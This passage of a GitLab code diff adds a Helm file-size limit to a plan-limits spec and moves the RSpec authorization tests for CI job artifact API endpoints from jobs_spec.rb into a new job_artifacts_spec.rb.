'PlanLimits' do 'plan_name': 'default', 'conan_max_file_size': 'a', 'generic_packages_max_file_size': 'b', + 'helm_max_file_size': 'h', 'maven_max_file_size': 'c', 'npm_max_file_size': 'd', 'nuget_max_file_size': 'e', @@ -140,8 +145,8 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do expect(json_response['error']).to include( 'conan_max_file_size is invalid', 'generic_packages_max_file_size is invalid', + 'helm_max_file_size is invalid', 'maven_max_file_size is invalid', - 'generic_packages_max_file_size is invalid', 'npm_max_file_size is invalid', 'nuget_max_file_size is invalid', 'pypi_max_file_size is invalid', diff --git a/spec/requests/api/ci/job_artifacts_spec.rb b/spec/requests/api/ci/job_artifacts_spec.rb new file mode 100644 index 00000000000..585fab33708 --- /dev/null +++ b/spec/requests/api/ci/job_artifacts_spec.rb @@ -0,0 +1,661 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::Ci::JobArtifacts do + include HttpBasicAuthHelpers + include DependencyProxyHelpers + + include HttpIOHelpers + + let_it_be(:project, reload: true) do + create(:project, :repository, public_builds: false) + end + + let_it_be(:pipeline, reload: true) do + create(:ci_pipeline, project: project, + sha: project.commit.id, + ref: project.default_branch) + end + + let(:user) { create(:user) } + let(:api_user) { user } + let(:reporter) { create(:project_member, :reporter, project: project).user } + let(:guest) { create(:project_member, :guest, project: project).user } + + let!(:job) do + create(:ci_build, :success, :tags, pipeline: pipeline, + artifacts_expire_at: 1.day.since) + end + + before do + project.add_developer(user) + end + + shared_examples 'returns unauthorized' do + it 'returns unauthorized' do + expect(response).to have_gitlab_http_status(:unauthorized) + end + end + + describe 'DELETE /projects/:id/jobs/:job_id/artifacts' do + let!(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } + + before do + delete api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + context 'when user is anonymous' do + let(:api_user) { nil } + + it 'does not delete artifacts' do + expect(job.job_artifacts.size).to eq 2 + end + + it 'returns status 401 (unauthorized)' do + expect(response).to have_gitlab_http_status(:unauthorized) + end + end + + context 'with developer' do + it 'does not delete artifacts' do + expect(job.job_artifacts.size).to eq 2 + end + + it 'returns status 403 (forbidden)' do + expect(response).to have_gitlab_http_status(:forbidden) + end + end + + context 'with authorized user' do + let(:maintainer) { create(:project_member, :maintainer, project: project).user } + let!(:api_user) { maintainer } + + it 'deletes artifacts' do + expect(job.job_artifacts.size).to eq 0 + end + + it 'returns status 204 (no content)' do + expect(response).to have_gitlab_http_status(:no_content) + end + end + end + + describe 'GET /projects/:id/jobs/:job_id/artifacts/:artifact_path' do + context 'when job has artifacts' do + let(:job) { create(:ci_build, :artifacts, pipeline: pipeline) } + + let(:artifact) do + 'other_artifacts_0.1.2/another-subdirectory/banana_sample.gif' + end + + context 'when user is anonymous' do + let(:api_user) { nil } + + context 'when project is public' do + it 'allows to access artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, true) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + end + end + + context 'when project is public with artifacts that are non public' do + let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline) } + + it 'rejects access to artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, true) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:forbidden) + end + + context 'with the non_public_artifacts feature flag disabled' do + before do + stub_feature_flags(non_public_artifacts: false) + end + + it 'allows access to artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, true) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + end + end + end + + context 'when project is public with builds access disabled' do + it 'rejects access to artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, false) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:forbidden) + end + end + + context 'when project is private' do + it 'rejects access and hides existence of artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PRIVATE) + project.update_column(:public_builds, true) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + + context 'when user is authorized' do + it 'returns a specific artifact file for a valid path' do + expect(Gitlab::Workhorse) + .to receive(:send_artifacts_entry) + .and_call_original + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h) + .to include('Content-Type' => 'application/json', + 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + expect(response.parsed_body).to be_empty + end + + context 'when artifacts are locked' do + it 'allows access to expired artifact' do + pipeline.artifacts_locked! + job.update!(artifacts_expire_at: Time.now - 7.days) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + end + end + end + end + + context 'when job does not have artifacts' do + it 'does not return job artifact file' do + get_artifact_file('some/artifact') + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + def get_artifact_file(artifact_path) + get api("/projects/#{project.id}/jobs/#{job.id}/" \ + "artifacts/#{artifact_path}", api_user) + end + end + + describe 'GET /projects/:id/jobs/:job_id/artifacts' do + shared_examples 'downloads artifact' do + let(:download_headers) do + { 'Content-Transfer-Encoding' => 'binary', + 'Content-Disposition' => %q(attachment; filename="ci_build_artifacts.zip"; filename*=UTF-8''ci_build_artifacts.zip) } + end + + it 'returns specific job artifacts' do + subject + + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h).to include(download_headers) + expect(response.body).to match_file(job.artifacts_file.file.file) + end + end + + context 'normal authentication' do + context 'job with artifacts' do + context 'when artifacts are stored locally' do + let(:job) { create(:ci_build, :artifacts, pipeline: pipeline) } + + subject { get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) } + + context 'authorized user' do + it_behaves_like 'downloads artifact' + end + + context 'when job token is used' do + let(:other_job) { create(:ci_build, :running, user: user) } + + subject { get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", job_token: other_job.token) } + + before do + stub_licensed_features(cross_project_pipelines: true) + end + + it_behaves_like 'downloads artifact' + + context 'when job token scope is enabled' do + before do + other_job.project.ci_cd_settings.update!(job_token_scope_enabled: true) + end + + it 'does not allow downloading artifacts' do + subject + + expect(response).to have_gitlab_http_status(:not_found) + end + + context 'when project is added to the job token scope' do + let!(:link) { create(:ci_job_token_project_scope_link, source_project: other_job.project, target_project: job.project) } + + it_behaves_like 'downloads artifact' + end + end + end + + context 'unauthorized user' do + let(:api_user) { nil } + + it 'does not return specific job artifacts' do + subject + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + + context 'when artifacts are stored remotely' do + let(:proxy_download) { false } + let(:job) { create(:ci_build, pipeline: pipeline) } + let(:artifact) { create(:ci_job_artifact, :archive, :remote_store, job: job) } + + before do + stub_artifacts_object_storage(proxy_download: proxy_download) + + artifact + job.reload + + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + context 'when proxy download is enabled' do + let(:proxy_download) { true } + + it 'responds with the workhorse send-url' do + expect(response.headers[Gitlab::Workhorse::SEND_DATA_HEADER]).to start_with("send-url:") + end + end + + context 'when proxy download is disabled' do + it 'returns location redirect' do + expect(response).to have_gitlab_http_status(:found) + end + end + + context 'authorized user' do + it 'returns the file remote URL' do + expect(response).to redirect_to(artifact.file.url) + end + end + + context 'unauthorized user' do + let(:api_user) { nil } + + it 'does not return specific job artifacts' do + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + + context 'when public project guest and artifacts are non public' do + let(:api_user) { guest } + let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline) } + + before do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, true) + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + it 'rejects access and hides existence of artifacts' do + expect(response).to have_gitlab_http_status(:forbidden) + end + + context 'with the non_public_artifacts feature flag disabled' do + before do + stub_feature_flags(non_public_artifacts: false) + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + it 'allows access to artifacts' do + expect(response).to have_gitlab_http_status(:ok) + end + end + end + + it 'does not return job artifacts if not uploaded' do + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + end + + describe 'GET /projects/:id/artifacts/:ref_name/download?job=name' do + let(:api_user) { reporter } + let(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } + + before do + stub_artifacts_object_storage + job.success + end + + def get_for_ref(ref = pipeline.ref, job_name = job.name) + get api("/projects/#{project.id}/jobs/artifacts/#{ref}/download", api_user), params: { job: job_name } + end + + context 'when not logged in' do + let(:api_user) { nil } + + before do + get_for_ref + end + + it 'does not find a resource in a private project' do + expect(project).to be_private + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when logging as guest' do + let(:api_user) { guest } + + before do + get_for_ref + end + + it 'gives 403' do + expect(response).to have_gitlab_http_status(:forbidden) + end + end + + context 'non-existing job' do + shared_examples 'not found' do + it { expect(response).to have_gitlab_http_status(:not_found) } + end + + context 'has no such ref' do + before do + get_for_ref('TAIL') + end + + it_behaves_like 'not found' + end + + context 'has no such job' do + before do + get_for_ref(pipeline.ref, 'NOBUILD') + end + + it_behaves_like 'not found' + end + end + + context 'find proper job' do + let(:job_with_artifacts) { job } + + shared_examples 'a valid file' do + context 'when artifacts are stored locally', :sidekiq_might_not_need_inline do + let(:download_headers) do + { 'Content-Transfer-Encoding' => 'binary', + 'Content-Disposition' => + %Q(attachment; filename="#{job_with_artifacts.artifacts_file.filename}"; filename*=UTF-8''#{job.artifacts_file.filename}) } + end + + it { expect(response).to have_gitlab_http_status(:ok) } + it { expect(response.headers.to_h).to include(download_headers) } + end + + context 'when artifacts are stored remotely' do + let(:job) { create(:ci_build, pipeline: pipeline, user: api_user) } + let!(:artifact) { create(:ci_job_artifact, :archive, :remote_store, job: job) } + + before do + job.reload + + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + it 'returns location redirect' do + expect(response).to have_gitlab_http_status(:found) + end + end + end + + context 'with regular branch' do + before do + pipeline.reload + pipeline.update!(ref: 'master', + sha: project.commit('master').sha) + + get_for_ref('master') + end + + it_behaves_like 'a valid file' + end + + context 'with branch name containing slash' do + before do + pipeline.reload + pipeline.update!(ref: 'improve/awesome', sha: project.commit('improve/awesome').sha) + get_for_ref('improve/awesome') + end + + it_behaves_like 'a valid file' + end + + context 'with job name in a child pipeline' do + let(:child_pipeline) { create(:ci_pipeline, child_of: pipeline) } + let!(:child_job) { create(:ci_build, :artifacts, :success, name: 'rspec', pipeline: child_pipeline) } + let(:job_with_artifacts) { child_job } + + before do + get_for_ref('master', child_job.name) + end + + it_behaves_like 'a valid file' + end + end + end + + describe 'GET id/jobs/artifacts/:ref_name/raw/*artifact_path?job=name' do + context 'when job has artifacts' do + let(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } + let(:artifact) { 'other_artifacts_0.1.2/another-subdirectory/banana_sample.gif' } + let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } + let(:public_builds) { true } + + before do + stub_artifacts_object_storage + job.success + + project.update!(visibility_level: visibility_level, + public_builds: public_builds) + + get_artifact_file(artifact) + end + + context 'when user is anonymous' do + let(:api_user) { nil } + + context 'when project is public' do + let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } + let(:public_builds) { true } + + it 'allows to access artifacts', :sidekiq_might_not_need_inline do + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h) + .to include('Content-Type' => 'application/json', + 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + end + + context 'when project is public with builds access disabled' do + let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } + let(:public_builds) { false } + + it 'rejects access to artifacts' do + expect(response).to have_gitlab_http_status(:forbidden) + expect(json_response).to have_key('message') + expect(response.headers.to_h) + .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + end + + context 'when project is public with non public artifacts' do + let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline, user: api_user) } + let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } + let(:public_builds) { true } + + it 'rejects access and hides existence of artifacts', :sidekiq_might_not_need_inline do + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:forbidden) + expect(json_response).to have_key('message') + expect(response.headers.to_h) + .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + + context 'with the non_public_artifacts feature flag disabled' do + before do + stub_feature_flags(non_public_artifacts: false) + end + + it 'allows access to artifacts', :sidekiq_might_not_need_inline do + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + end + end + end + + context 'when project is private' do + let(:visibility_level) { Gitlab::VisibilityLevel::PRIVATE } + let(:public_builds) { true } + + it 'rejects access and hides existence of artifacts' do + expect(response).to have_gitlab_http_status(:not_found) + expect(json_response).to have_key('message') + expect(response.headers.to_h) + .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + end + end + + context 'when user is authorized' do + let(:visibility_level) { Gitlab::VisibilityLevel::PRIVATE } + let(:public_builds) { true } + + it 'returns a specific artifact file for a valid path', :sidekiq_might_not_need_inline do + expect(Gitlab::Workhorse) + .to receive(:send_artifacts_entry) + .and_call_original + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h) + .to include('Content-Type' => 'application/json', + 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + expect(response.parsed_body).to be_empty + end + end + + context 'with branch name containing slash' do + before do + pipeline.reload + pipeline.update!(ref: 'improve/awesome', + sha: project.commit('improve/awesome').sha) + end + + it 'returns a specific artifact file for a valid path', :sidekiq_might_not_need_inline do + get_artifact_file(artifact, 'improve/awesome') + + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h) + .to include('Content-Type' => 'application/json', + 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + end + end + + context 'non-existing job' do + shared_examples 'not found' do + it { expect(response).to have_gitlab_http_status(:not_found) } + end + + context 'has no such ref' do + before do + get_artifact_file('some/artifact', 'wrong-ref') + end + + it_behaves_like 'not found' + end + + context 'has no such job' do + before do + get_artifact_file('some/artifact', pipeline.ref, 'wrong-job-name') + end + + it_behaves_like 'not found' + end + end + end + + context 'when job does not have artifacts' do + let(:job) { create(:ci_build, pipeline: pipeline, user: api_user) } + + it 'does not return job artifact file' do + get_artifact_file('some/artifact') + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + def get_artifact_file(artifact_path, ref = pipeline.ref, job_name = job.name) + get api("/projects/#{project.id}/jobs/artifacts/#{ref}/raw/#{artifact_path}", api_user), params: { job: job_name } + end + end + + describe 'POST /projects/:id/jobs/:job_id/artifacts/keep' do + before do + post api("/projects/#{project.id}/jobs/#{job.id}/artifacts/keep", user) + end + + context 'artifacts did not expire' do + let(:job) do + create(:ci_build, :trace_artifact, :artifacts, :success, + project: project, pipeline: pipeline, artifacts_expire_at: Time.now + 7.days) + end + + it 'keeps artifacts' do + expect(response).to have_gitlab_http_status(:ok) + expect(job.reload.artifacts_expire_at).to be_nil + end + end + + context 'no artifacts' do + let(:job) { create(:ci_build, project: project, pipeline: pipeline) } + + it 'responds with not found' do + expect(response).to have_gitlab_http_status(:not_found) + end + end + end +end diff --git a/spec/requests/api/ci/jobs_spec.rb b/spec/requests/api/ci/jobs_spec.rb index 410020b68cd..7c85cbc31a5 100644 --- a/spec/requests/api/ci/jobs_spec.rb +++ b/spec/requests/api/ci/jobs_spec.rb @@ -428,584 +428,41 @@ RSpec.describe API::Ci::Jobs do end end - context 'when trace artifact record exists with no stored file', :skip_before_request do - before do - create(:ci_job_artifact, :unarchived_trace_artifact, job: job, project: job.project) - end - - it 'returns no artifacts nor trace data' do + context 'when job succeeded' do + it 'does not return failure_reason' do get api("/projects/#{project.id}/jobs/#{job.id}", api_user) - expect(response).to have_gitlab_http_status(:ok) - expect(json_response['artifacts']).to be_an Array - expect(json_response['artifacts'].size).to eq(1) - expect(json_response['artifacts'][0]['file_type']).to eq('trace') - expect(json_response['artifacts'][0]['filename']).to eq('job.log') - end - end - end - - describe 'DELETE /projects/:id/jobs/:job_id/artifacts' do - let!(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } - - before do - delete api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - context 'when user is anonymous' do - let(:api_user) { nil } - - it 'does not delete artifacts' do - expect(job.job_artifacts.size).to eq 2 - end - - it 'returns status 401 (unauthorized)' do - expect(response).to have_gitlab_http_status(:unauthorized) - end - end - - context 'with developer' do - it 'does not delete artifacts' do - expect(job.job_artifacts.size).to eq 2 - end - - it 'returns status 403 (forbidden)' do - expect(response).to have_gitlab_http_status(:forbidden) - end - end - - context 'with authorized user' do - let(:maintainer) { create(:project_member, :maintainer, project: project).user } - let!(:api_user) { maintainer } - - it 'deletes artifacts' do - expect(job.job_artifacts.size).to eq 0 - end - - it 'returns status 204 (no content)' do - expect(response).to have_gitlab_http_status(:no_content) + expect(json_response).not_to include('failure_reason') end end - end - - describe 'GET /projects/:id/jobs/:job_id/artifacts/:artifact_path' do - context 'when job has artifacts' do - let(:job) { create(:ci_build, :artifacts, pipeline: pipeline) } - - let(:artifact) do - 'other_artifacts_0.1.2/another-subdirectory/banana_sample.gif' - end - - context 'when user is anonymous' do - let(:api_user) { nil } - - context 'when project is public' do - it 'allows to access artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, true) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - end - end - - context 'when project is public with artifacts that are non public' do - let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline) } - - it 'rejects access to artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, true) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:forbidden) - end - - context 'with the non_public_artifacts feature flag disabled' do - before do - stub_feature_flags(non_public_artifacts: false) - end - - it 'allows access to artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, true) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - end - end - end - - context 'when project is public with builds access disabled' do - it 'rejects access to artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, false) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:forbidden) - end - end - - context 'when project is private' do - it 'rejects access and hides existence of artifacts' do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PRIVATE) - project.update_column(:public_builds, true) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - context 'when user is authorized' do - it 'returns a specific artifact file for a valid path' do - expect(Gitlab::Workhorse) - .to receive(:send_artifacts_entry) - .and_call_original - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h) - .to include('Content-Type' => 'application/json', - 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - expect(response.parsed_body).to be_empty - end - - context 'when artifacts are locked' do - it 'allows access to expired artifact' do - pipeline.artifacts_locked! - job.update!(artifacts_expire_at: Time.now - 7.days) - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - end - end - end - end - - context 'when job does not have artifacts' do - it 'does not return job artifact file' do - get_artifact_file('some/artifact') - - expect(response).to have_gitlab_http_status(:not_found) - end - end - - def get_artifact_file(artifact_path) - get api("/projects/#{project.id}/jobs/#{job.id}/" \ - "artifacts/#{artifact_path}", api_user) - end - end - - describe 'GET /projects/:id/jobs/:job_id/artifacts' do - shared_examples 'downloads artifact' do - let(:download_headers) do - { 'Content-Transfer-Encoding' => 'binary', - 'Content-Disposition' => %q(attachment; filename="ci_build_artifacts.zip"; filename*=UTF-8''ci_build_artifacts.zip) } - end - - it 'returns specific job artifacts' do - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h).to include(download_headers) - expect(response.body).to match_file(job.artifacts_file.file.file) - end - end - - context 'normal authentication' do - context 'job with artifacts' do - context 'when artifacts are stored locally' do - let(:job) { create(:ci_build, :artifacts, pipeline: pipeline) } - - before do - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - context 'authorized user' do - it_behaves_like 'downloads artifact' - end - - context 'unauthorized user' do - let(:api_user) { nil } - - it 'does not return specific job artifacts' do - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - - context 'when artifacts are stored remotely' do - let(:proxy_download) { false } - let(:job) { create(:ci_build, pipeline: pipeline) } - let(:artifact) { create(:ci_job_artifact, :archive, :remote_store, job: job) } - - before do - stub_artifacts_object_storage(proxy_download: proxy_download) - - artifact - job.reload - - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - context 'when proxy download is enabled' do - let(:proxy_download) { true } - - it 'responds with the workhorse send-url' do - expect(response.headers[Gitlab::Workhorse::SEND_DATA_HEADER]).to start_with("send-url:") - end - end - - context 'when proxy download is disabled' do - it 'returns location redirect' do - expect(response).to have_gitlab_http_status(:found) - end - end - - context 'authorized user' do - it 'returns the file remote URL' do - expect(response).to redirect_to(artifact.file.url) - end - end - - context 'unauthorized user' do - let(:api_user) { nil } - - it 'does not return specific job artifacts' do - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - - context 'when public project guest and artifacts are non public' do - let(:api_user) { guest } - let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline) } - - before do - project.update_column(:visibility_level, - Gitlab::VisibilityLevel::PUBLIC) - project.update_column(:public_builds, true) - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - it 'rejects access and hides existence of artifacts' do - expect(response).to have_gitlab_http_status(:forbidden) - end - - context 'with the non_public_artifacts feature flag disabled' do - before do - stub_feature_flags(non_public_artifacts: false) - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - it 'allows access to artifacts' do - expect(response).to have_gitlab_http_status(:ok) - end - end - end - - it 'does not return job artifacts if not uploaded' do - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - - expect(response).to have_gitlab_http_status(:not_found) - end - end - end - end - - describe 'GET /projects/:id/artifacts/:ref_name/download?job=name' do - let(:api_user) { reporter } - let(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } - - before do - stub_artifacts_object_storage - job.success - end - - def get_for_ref(ref = pipeline.ref, job_name = job.name) - get api("/projects/#{project.id}/jobs/artifacts/#{ref}/download", api_user), params: { job: job_name } - end - - context 'when not logged in' do - let(:api_user) { nil } - - before do - get_for_ref - end - - it 'does not find a resource in a private project' do - expect(project).to be_private - expect(response).to have_gitlab_http_status(:not_found) - end - end - - context 'when logging as guest' do - let(:api_user) { guest } - - before do - get_for_ref - end - - it 'gives 403' do - expect(response).to have_gitlab_http_status(:forbidden) - end - end - - context 'non-existing job' do - shared_examples 'not found' do - it { expect(response).to have_gitlab_http_status(:not_found) } - end - - context 'has no such ref' do - before do - get_for_ref('TAIL') - end - - it_behaves_like 'not found' - end - - context 'has no such job' do - before do - get_for_ref(pipeline.ref, 'NOBUILD') - end - - it_behaves_like 'not found' - end - end - - context 'find proper job' do - let(:job_with_artifacts) { job } - - shared_examples 'a valid file' do - context 'when artifacts are stored locally', :sidekiq_might_not_need_inline do - let(:download_headers) do - { 'Content-Transfer-Encoding' => 'binary', - 'Content-Disposition' => - %Q(attachment; filename="#{job_with_artifacts.artifacts_file.filename}"; filename*=UTF-8''#{job.artifacts_file.filename}) } - end - - it { expect(response).to have_gitlab_http_status(:ok) } - it { expect(response.headers.to_h).to include(download_headers) } - end - - context 'when artifacts are stored remotely' do - let(:job) { create(:ci_build, pipeline: pipeline, user: api_user) } - let!(:artifact) { create(:ci_job_artifact, :archive, :remote_store, job: job) } - - before do - job.reload - - get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) - end - - it 'returns location redirect' do - expect(response).to have_gitlab_http_status(:found) - end - end - end - - context 'with regular branch' do - before do - pipeline.reload - pipeline.update!(ref: 'master', - sha: project.commit('master').sha) - - get_for_ref('master') - end - - it_behaves_like 'a valid file' - end - - context 'with branch name containing slash' do - before do - pipeline.reload - pipeline.update!(ref: 'improve/awesome', sha: project.commit('improve/awesome').sha) - get_for_ref('improve/awesome') - end - - it_behaves_like 'a valid file' + context 'when job failed' do + let(:job) do + create(:ci_build, :failed, :tags, pipeline: pipeline) end - context 'with job name in a child pipeline' do - let(:child_pipeline) { create(:ci_pipeline, child_of: pipeline) } - let!(:child_job) { create(:ci_build, :artifacts, :success, name: 'rspec', pipeline: child_pipeline) } - let(:job_with_artifacts) { child_job } - - before do - get_for_ref('master', child_job.name) - end + it 'returns failure_reason' do + get api("/projects/#{project.id}/jobs/#{job.id}", api_user) - it_behaves_like 'a valid file' + expect(json_response).to include('failure_reason') end end - end - - describe 'GET id/jobs/artifacts/:ref_name/raw/*artifact_path?job=name' do - context 'when job has artifacts' do - let(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } - let(:artifact) { 'other_artifacts_0.1.2/another-subdirectory/banana_sample.gif' } - let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } - let(:public_builds) { true } + context 'when trace artifact record exists with no stored file', :skip_before_request do before do - stub_artifacts_object_storage - job.success - - project.update!(visibility_level: visibility_level, - public_builds: public_builds) - - get_artifact_file(artifact) - end - - context 'when user is anonymous' do - let(:api_user) { nil } - - context 'when project is public' do - let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } - let(:public_builds) { true } - - it 'allows to access artifacts', :sidekiq_might_not_need_inline do - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h) - .to include('Content-Type' => 'application/json', - 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - end - - context 'when project is public with builds access disabled' do - let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } - let(:public_builds) { false } - - it 'rejects access to artifacts' do - expect(response).to have_gitlab_http_status(:forbidden) - expect(json_response).to have_key('message') - expect(response.headers.to_h) - .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - end - - context 'when project is public with non public artifacts' do - let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline, user: api_user) } - let(:visibility_level) { Gitlab::VisibilityLevel::PUBLIC } - let(:public_builds) { true } - - it 'rejects access and hides existence of artifacts', :sidekiq_might_not_need_inline do - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:forbidden) - expect(json_response).to have_key('message') - expect(response.headers.to_h) - .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - - context 'with the non_public_artifacts feature flag disabled' do - before do - stub_feature_flags(non_public_artifacts: false) - end - - it 'allows access to artifacts', :sidekiq_might_not_need_inline do - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - end - end - end - - context 'when project is private' do - let(:visibility_level) { Gitlab::VisibilityLevel::PRIVATE } - let(:public_builds) { true } - - it 'rejects access and hides existence of artifacts' do - expect(response).to have_gitlab_http_status(:not_found) - expect(json_response).to have_key('message') - expect(response.headers.to_h) - .not_to include('Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - end - end - - context 'when user is authorized' do - let(:visibility_level) { Gitlab::VisibilityLevel::PRIVATE } - let(:public_builds) { true } - - it 'returns a specific artifact file for a valid path', :sidekiq_might_not_need_inline do - expect(Gitlab::Workhorse) - .to receive(:send_artifacts_entry) - .and_call_original - - get_artifact_file(artifact) - - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h) - .to include('Content-Type' => 'application/json', - 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - expect(response.parsed_body).to be_empty - end - end - - context 'with branch name containing slash' do - before do - pipeline.reload - pipeline.update!(ref: 'improve/awesome', - sha: project.commit('improve/awesome').sha) - end - - it 'returns a specific artifact file for a valid path', :sidekiq_might_not_need_inline do - get_artifact_file(artifact, 'improve/awesome') - - expect(response).to have_gitlab_http_status(:ok) - expect(response.headers.to_h) - .to include('Content-Type' => 'application/json', - 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) - end - end - - context 'non-existing job' do - shared_examples 'not found' do - it { expect(response).to have_gitlab_http_status(:not_found) } - end - - context 'has no such ref' do - before do - get_artifact_file('some/artifact', 'wrong-ref') - end - - it_behaves_like 'not found' - end - - context 'has no such job' do - before do - get_artifact_file('some/artifact', pipeline.ref, 'wrong-job-name') - end - - it_behaves_like 'not found' - end + create(:ci_job_artifact, :unarchived_trace_artifact, job: job, project: job.project) end - end - context 'when job does not have artifacts' do - let(:job) { create(:ci_build, pipeline: pipeline, user: api_user) } - - it 'does not return job artifact file' do - get_artifact_file('some/artifact') + it 'returns no artifacts nor trace data' do + get api("/projects/#{project.id}/jobs/#{job.id}", api_user) - expect(response).to have_gitlab_http_status(:not_found) + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['artifacts']).to be_an Array + expect(json_response['artifacts'].size).to eq(1) + expect(json_response['artifacts'][0]['file_type']).to eq('trace') + expect(json_response['artifacts'][0]['filename']).to eq('job.log') end end - - def get_artifact_file(artifact_path, ref = pipeline.ref, job_name = job.name) - get api("/projects/#{project.id}/jobs/artifacts/#{ref}/raw/#{artifact_path}", api_user), params: { job: job_name } - end end describe 'GET /projects/:id/jobs/:job_id/trace' do @@ -1249,32 +706,6 @@ RSpec.describe API::Ci::Jobs do end end - describe 'POST 